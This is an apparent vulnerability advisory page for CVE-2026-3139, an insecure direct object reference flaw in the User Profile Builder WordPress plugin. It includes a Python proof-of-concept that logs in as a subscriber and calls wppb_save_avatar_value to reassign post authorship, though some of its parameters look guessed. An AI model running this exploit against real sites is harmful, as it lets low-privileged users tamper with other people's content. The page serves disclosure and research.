Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-3139 CVSS 4.3 MEDIUM

CVE-2026-3139

Published: 2026-03-31 12:16:31
Last Modified: 2026-04-24 18:11:17
Source: [email protected]

Description

The User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 3.15.5 via the wppb_save_avatar_value() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to reassign ownership of arbitrary posts and attachments by changing 'post_author'.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

User Profile Builder <= 3.15.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "https://example.com/wp-admin/admin-ajax.php" username = "subscriber_user" password = "password123" # 1. Authenticate as a low-privileged user (Subscriber) session = requests.Session() login_payload = { "log": username, "pwd": password, "redirect_to": "https://example.com/wp-admin/", "wp-submit": "Log In" } session.post("https://example.com/wp-login.php", data=login_payload) # 2. Exploit the IDOR vulnerability # The vulnerable function wppb_save_avatar_value() accepts a post_author parameter # without checking if the current user owns the post or has permission to change it. exploit_payload = { "action": "wppb_save_avatar_value", "post_id": "123", # ID of the target post to hijack "post_author": "1", # ID of the target user (e.g., Admin) "meta_data": "some_value" # Other required parameters by the function } response = session.post(target_url, data=exploit_payload) if response.status_code == 200: print("[+] Exploit successful! Post author likely changed.") else: print("[-] Exploit failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3139", "sourceIdentifier": "[email protected]", "published": "2026-03-31T12:16:31.037", "lastModified": "2026-04-24T18:11:16.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 3.15.5 via the wppb_save_avatar_value() function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to reassign ownership of arbitrary posts and attachments by changing 'post_author'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3481772/profile-builder", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/760f7736-db49-4210-a2f3-3abb506106d7?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.